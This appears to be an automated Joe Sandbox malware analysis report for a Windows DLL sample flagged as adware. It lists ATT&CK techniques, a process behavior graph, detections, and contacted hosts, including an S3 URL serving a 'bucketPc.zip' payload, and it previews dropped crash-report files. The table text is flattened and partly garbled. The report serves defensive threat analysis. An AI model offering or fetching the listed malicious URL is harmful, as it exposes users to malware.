Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
Process Injection
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS22
System Information Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Rundll32
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1408464 Sample: decrypt-main.dll.dll Startdate: 13/03/2024 Architecture: WINDOWS Score: 56 31 s3-r-w.sa-east-1.amazonaws.com 2->31 33 bucreate203920233.s3.sa-east-1.amazonaws.com 2->33 37 Multi AV Scanner detection for submitted file 2->37 9 loaddll64.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 20 9->11         started        15 cmd.exe 1 9->15         started        17 rundll32.exe 9->17         started        19 7 other processes 9->19 dnsIp6 35 s3-r-w.sa-east-1.amazonaws.com 52.95.163.36, 443, 49723 AMAZON-02US United States 11->35 39 System process connects to network (likely due to code injection or exploit) 11->39 21 WerFault.exe 16 11->21         started        23 rundll32.exe 15->23         started        25 WerFault.exe 17->25         started        27 WerFault.exe 16 19->27         started        signatures7 process8 process9 29 WerFault.exe 23 16 23->29         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
decrypt-main.dll.dll45%ReversingLabsWin64.Adware.RedCap
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://crl.micro0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s3-r-w.sa-east-1.amazonaws.com
52.95.163.36
truefalse
    high
    bucreate203920233.s3.sa-east-1.amazonaws.com
    unknown
    unknownfalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip)crundll32.exe, 00000005.00000002.2533961841.000001FA1D350000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://upx.sf.netAmcache.hve.10.drfalse
            high
            http://crl.microrundll32.exe, 00000005.00000003.2205682217.000001FA1F332000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.delphiforfun.org/rundll32.exe, rundll32.exe, 00000014.00000002.2596173277.0000000000428000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000015.00000002.2277081579.0000000000428000.00000020.00000001.01000000.00000003.sdmp, decrypt-main.dll.dllfalse
              high
              https://bucreate203920233.s3.sa-east-1.amazonaws.com/rundll32.exe, 00000005.00000002.2533961841.000001FA1D377000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://bucreate203920233.s3.sa-east-1.amazonaws.com/2rundll32.exe, 00000005.00000002.2533961841.000001FA1D377000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  52.95.163.36
                  s3-r-w.sa-east-1.amazonaws.comUnited States
                  16509AMAZON-02USfalse
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1408464
                  Start date and time:2024-03-13 17:00:19 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 52s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:32
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:decrypt-main.dll.dll
                  renamed because original name is a hash value
                  Original Sample Name:decrypt-main.dll.exe
                  Detection:MAL
                  Classification:mal56.evad.winDLL@26/17@1/1
                  EGA Information:
                  • Successful, ratio: 57.1%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .dll
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.42.65.92, 52.182.143.212
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target rundll32.exe, PID 4072 because it is empty
                  • Execution Graph export aborted for target rundll32.exe, PID 7028 because it is empty
                  • Execution Graph export aborted for target rundll32.exe, PID 948 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: decrypt-main.dll.dll
                  No simulations
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  s3-r-w.sa-east-1.amazonaws.comappdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                  • 3.5.234.32
                  appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                  • 3.5.233.174
                  00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                  • 3.5.232.137
                  00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                  • 16.12.1.14
                  0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                  • 3.5.232.21
                  0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                  • 3.5.234.1
                  0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                  • 3.5.232.185
                  WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                  • 52.95.163.114
                  WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                  • 16.12.0.34
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AMAZON-02USK1Zy8G0qc9.elfGet hashmaliciousGafgytBrowse
                  • 34.243.160.129
                  http://www.appliedchip.sa.com/ujgcbwgpip/nnwt2533uesekxt/aGgsGAM1rJDuWVBdVh1dKJWAZCvQCU2pDgRa7zmgHJ0/7sv5N0n1ZnaIRYSVbZ2ydPYUo8nqg1WkfjRfcseTbBNZvzw2ZIkMjyEARIwtw95IGet hashmaliciousUnknownBrowse
                  • 18.238.49.28
                  YYh2P0kLYU.elfGet hashmaliciousGafgytBrowse
                  • 54.217.10.153
                  u2tYT9wtaT.elfGet hashmaliciousGafgytBrowse
                  • 54.171.230.55
                  Zimbra Web Client Sign In13.htmGet hashmaliciousUnknownBrowse
                  • 18.238.49.126
                  KbmRPY5t1V.elfGet hashmaliciousGafgytBrowse
                  • 34.243.160.129
                  linux_arm7.elfGet hashmaliciousChaosBrowse
                  • 34.254.182.186
                  jqytEdh6Gw.elfGet hashmaliciousGafgytBrowse
                  • 34.249.145.219
                  na.elfGet hashmaliciousMiraiBrowse
                  • 65.0.213.204
                  na.elfGet hashmaliciousMiraiBrowse
                  • 18.152.28.104
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  37f463bf4616ecd445d4a1937da06e19E-dekont.exeGet hashmaliciousAgentTeslaBrowse
                  • 52.95.163.36
                  MT103.exeGet hashmaliciousAgentTeslaBrowse
                  • 52.95.163.36
                  BL copy.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 52.95.163.36
                  2257HVL2300001691.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 52.95.163.36
                  Bibeskftigelserne221.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 52.95.163.36
                  https://us02web.zoom.us/j/81580289193?pwd=VjdCRUE1bjQ4dEpWUkpOR0poRm12dz09Get hashmaliciousUnknownBrowse
                  • 52.95.163.36
                  Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 52.95.163.36
                  Scanned PO Copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 52.95.163.36
                  EandP_approval_0311202401266.vbsGet hashmaliciousXWormBrowse
                  • 52.95.163.36
                  No context
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8483375234553934
                  Encrypted:false
                  SSDEEP:96:vmFjk6EuiCyKynsjZ4RvSCppfxPQXIDcQtZc6t1ZcEmcw3HXaXz+HbHgSQgJjy+s:u7iCynJ4097Z8jjaWwzuiFvZ24lO8J
                  MD5:B60AC78A03E76A14A229B35C584EBB11
                  SHA1:497663699930AA1D7848CA3BD192A217FCF17E11
                  SHA-256:4F006979B75F107471EDC79A8C1B009BBB36C44EF69526B3013CF7545C89CDD3
                  SHA-512:E4B282F6A9F1BC677829DF56EAF125CD6447C963B52E3355FE4B4EDF6CD0401EF62710A122748423CA4D49DB734C10CBDEA1BB010EAB1FF72E02D9BBB6993784
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.9.2.8.8.4.0.1.2.4.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.9.2.8.8.9.4.8.1.2.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.e.7.2.a.b.3.-.6.2.8.3.-.4.4.7.a.-.8.c.a.f.-.2.5.3.0.b.1.9.2.6.e.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.9.e.3.e.1.6.-.d.a.8.e.-.4.5.5.8.-.b.f.3.6.-.0.c.c.b.f.3.c.2.4.f.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.4.-.0.0.0.1.-.0.0.1.5.-.3.5.1.d.-.f.6.b.4.5.f.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8484596487229368
                  Encrypted:false
                  SSDEEP:96:KAVFlguixyKy4sjZ4RvSCppfxPQXIDcQtZc6t1ZcEmcw3HXaXz+HbHgSQgJjy+Um:XFixy4J4097Z8jjKuwzuiFvZ24lO8J
                  MD5:79909763CBF12F206BF63ECF43B1FB11
                  SHA1:C92CE75905489B4BFF4C237B8463988E62580BAB
                  SHA-256:742601A0F4D65897EEBB1886D0A46C2BCA813C12B02BEC6067C725AF30C9D4EF
                  SHA-512:6A4792CB4374BD06285D286783A09A960D34D8E478E4455B320A30BD6933CDC718700634A65120501ED0915787CC1C1A74BE56B0E29AC511E53B05AE93EA7EAA
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.9.2.8.5.1.4.1.4.1.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.9.2.8.5.6.2.5.7.6.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.2.6.b.5.4.8.-.f.0.b.8.-.4.4.b.7.-.8.e.4.c.-.0.a.5.0.b.f.6.9.b.d.5.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.b.1.e.1.f.4.-.0.d.8.7.-.4.6.8.c.-.9.b.c.8.-.1.2.a.1.e.b.0.1.1.a.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.e.8.-.0.0.0.1.-.0.0.1.5.-.9.e.b.6.-.1.5.b.3.5.f.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.85223844785682
                  Encrypted:false
                  SSDEEP:96:NbFcPui7yKyRsjZ4RvSCpxL6tQXIDcQkc6wZcEGcw3OsUZXaXz+HbHgSQgJjy+UQ:phi7yRD06UZMKFBjauwzuiFvZ24lO8W
                  MD5:098DBCF2F81F6DBE0FED3342DCC607C2
                  SHA1:FB669304A0FC72250BFBED5F06AE2C51A4DBD0FE
                  SHA-256:3045B5E1D97EDD97C1F229FFC555EA6577B52BAF68A654B1B5849BF264835D35
                  SHA-512:9524BD7B95F9FA8D4A70019C0AA529539C89AFF51F3EE597445B70A7F1D5E1DE8099CA5647E6E067AD3F9488840AD982458105219C7F8B82F2C89B5026664A0A
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.9.2.7.9.3.0.4.9.9.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.9.2.8.0.1.1.7.4.9.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.f.e.2.9.1.b.-.7.6.9.a.-.4.1.1.f.-.9.c.c.e.-.c.2.6.7.5.4.2.d.2.e.6.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.a.f.9.2.1.b.-.8.b.6.c.-.4.4.0.9.-.b.e.3.1.-.c.9.c.8.6.6.5.d.8.0.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.b.4.-.0.0.0.1.-.0.0.1.5.-.9.b.a.b.-.7.9.a.f.5.f.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.1056140293456171
                  Encrypted:false
                  SSDEEP:192:KOKizyXDI03+3h6jaun1jfNzuiFvZ24lO8J:9KiGXDj3+3ojNNzuiFvY4lO8J
                  MD5:17AEEB550D2C297189F741778D996C72
                  SHA1:646F9DB8B5F3526AC0406AA3B7FB4A45447A8383
                  SHA-256:F9345968C01B0271CB3D520A63E8ED10B175905040E732612C01A2151CB12233
                  SHA-512:F23CCA4B3B12FDA0D2CD052672653E956E27BA3C5B35CD3B698A8C117C7B438E34C2C5D3AA9E6BDCE39520FB8F045F61B703DA6DF8921C04B29E9290036F3A57
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.9.2.8.1.7.1.8.9.0.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.9.2.8.2.5.4.7.0.4.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.e.f.1.0.3.0.-.2.4.9.1.-.4.3.6.5.-.a.3.9.1.-.3.5.e.1.7.e.c.7.5.5.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.a.5.d.9.5.1.-.3.8.5.c.-.4.8.e.d.-.9.a.e.b.-.9.2.d.5.e.0.5.2.b.9.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.c.-.0.0.0.1.-.0.0.1.5.-.e.c.b.f.-.7.7.a.f.5.f.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Mar 13 16:01:19 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):58416
                  Entropy (8bit):1.6978597331169087
                  Encrypted:false
                  SSDEEP:192:ACJ7XqkUu9jgOMNMBKOtj6S5s9aer8uIKVMMEZvuT:fXNUu9kMBK0880+Myvi
                  MD5:74F49ABF11E187DD6AD61AF8C87B299E
                  SHA1:282F639186C50783AB5ABD564C13CC5A03E044FC
                  SHA-256:82BAFB0F67FE74A52BEF8C0119B1151362F89C4A0A40738A89DF813118FD1C4E
                  SHA-512:D31531B01205BF4B6C1F902F6CA3013B990976431BBAB5E4792C9CEFEC6D44FAF48D29015A2D94191957F4F29B150EF7FBDFDEA7D8901E2C0C2909EB34BA8AB2
                  Malicious:false
                  Preview:MDMP..a..... ..........e........................................~...........T.......8...........T........... ............... ...........................................................................................eJ..............Lw......................T..............e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8828
                  Entropy (8bit):3.693836017561133
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJIlBCui6YBB+fgmf2INmFJTprO89bBe9fZLm:R6lXJ6Qui6YnOgmf2Iu3BUfo
                  MD5:46DE451CB5999E8EFB852980329FA17E
                  SHA1:AA56940B4D7DDC4ABEF364F0BFFF595AB931A8A6
                  SHA-256:F63B5B49262B43745AB27D591ADAF0B908C3CD28C225AECDBA3480BD5FF1F371
                  SHA-512:ECB448FEA6371CFC433EA35E484ED6415281CBE32888D869509BBFA359DA4C0BCD10A0BAAC34867418F5FF74DB6313A9CBC3C06D117B06DF47E6D7615B7A4198
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.4.8.<./.P.i.d.
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4902
                  Entropy (8bit):4.471607699568587
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsXJg771I98nWpW8VYnYm8M4JC2CU/FzHyq8vhUJptSTSAd:uIjf5I73W7V3JdHWmpoOAd
                  MD5:D29537DE1C7795CCC732F4FF62504B61
                  SHA1:9CCE56500279AB5376655C2795028D990C9847D0
                  SHA-256:9F10953F83CA135BB2A3D145B8C8A4C2C5A1D68FBB2C0550A2ED2A448041D5E9
                  SHA-512:4D2C79F81335090378F1ECF40F49125C569CEA4029F893251B050EB226B76727578953DD9AADBC7DB3288212AB567E0CC5AF06E766E9F1EE2921EA124E4BD951
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233704" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Mar 13 16:01:22 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):163588
                  Entropy (8bit):1.6184346238812257
                  Encrypted:false
                  SSDEEP:384:ZWLOkMsWB5RXru2dNnEsMZMaICFZJYtehoJgJoCXenV4IBd5GlHyMrSY:COHsWBrS2dY4ehoJgJoCIxBnwGY
                  MD5:F832A489AE7765676B2BD98A3C134C20
                  SHA1:A3CB6C65F2920DAA2498FB0F82767F58B1B63840
                  SHA-256:99570DC45147AD45D4AF6149AB0C81E5E555C92EA4EE559A585869733566B690
                  SHA-512:71A62E1CAF7CF4E32D0757C3AF6CB9ED0C74B9758F28CAF620418E6268D3599763B5E5E7A30B72A2045C405628314257E681AE4739020A5162639615A971397E
                  Malicious:false
                  Preview:MDMP..a..... ..........e....................................4...._..........T.......8...........T............L...2..........p%..........\'..............................................................................eJ.......'......Lw......................T..............e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):9004
                  Entropy (8bit):3.70717518240535
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJQGQ6Yj5Hgmf3R4l00ETprH89bh/CfMLm:R6lXJ5Q6YdHgmf3R4lHhKft
                  MD5:22E35C2335E5C40D1529A3B7919257C4
                  SHA1:A357F8961D2D63D11100E3F2BCE5F8F23E054A2F
                  SHA-256:A1EFF4B56D97802E31CB95A67ADC8BACA350FB7C0E5771AA738368FAD292D8B7
                  SHA-512:CC22D4A41FA788E6C9FCDF9C4E70E5E5D7DC051B213977CFEC9A2EA33882D1C5BF7657CFE8D63B8E0DDF3CA6B42F3913F5320FE78A7309EB5DD5A9C721DA7667
                  Malicious:false
